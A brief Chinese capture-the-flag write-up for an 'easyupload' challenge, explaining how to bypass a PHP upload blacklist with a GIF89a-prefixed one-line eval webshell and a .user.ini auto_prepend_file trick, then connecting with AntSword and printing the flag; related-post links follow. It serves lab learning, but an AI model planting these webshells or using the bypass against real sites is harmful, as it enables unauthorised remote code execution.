CTF之easyupload

拿到题目发现是文件上传的漏洞,但是这个黑名单过滤的有点严格,无论是文件里还是文件后缀都不能出现php

那我们就用<?=eval($_POST['a']);?>来进行绕过(注意这里要加个GIF89a或者GIP87a进行欺骗)

但是后缀依然不能绕过怎么办?

接下来就要学新知识了

.user.ini文件

auto_prepend_file可以让所有的php文件自动的包含某个文件。

例如在.user.ini文件中写入

auto_prepend_file=shell.jpg

然后在shell.jpg中写入一个一句话木嘛

<?php eval($_P0ST['aaa']); ?>

那么和.user.ini和shell.jpg同一目录下的所有php文件都会包含shell.jpg文件。

这里上传.user.ini文件

文件里写:auto_prepend_file=a.jpg

注意:要进行抓包将文件类型改成Content-Type: image/jpeg并且也要加GIF89a或者GIF87a

然后再上传一个对应的木马文件,并且后缀为图片类型

最后就是用蚁剑连接了注意连接地址是/uploads/index.php

cyberpeace{8e50e0951cae4b39f7c312da788c71bb}

相关推荐
说私域12 小时前
全民电商时代下的链动2+1模式与S2B2C商城小程序:社交裂变与供应链协同的营销革命
开发语言·人工智能·小程序·php·流量运营
catchadmin13 小时前
2026 年 PHP 函数式编程 优势与实际应用
数据库·php
2301_8109703913 小时前
第一次渗透作业
web安全·php
DARLING Zero two♡13 小时前
【计算机网络】简学深悟启示录:序列化&&反序列化
开发语言·计算机网络·php
100编程朱老师14 小时前
fping命令详解
开发语言·php
久违 °14 小时前
【安全开发】Nmap主机探测技术详解(一)
网络·安全·网络安全
小小代码狗14 小时前
【无标题】
网络·sql·php
Wcy307651906614 小时前
文件包含漏洞及PHP伪协议
开发语言·php
Whoami!14 小时前
❿⁄₁₄ ⟦ OSCP ⬖ 研记 ⟧ 密码攻击实践 ➱ 传递Net-NTLMv2哈希
网络安全·信息安全·密码破解·ntlm哈希
周某人姓周14 小时前
sqli-labs注入靶场搭建与sql语句
sql·安全·网络安全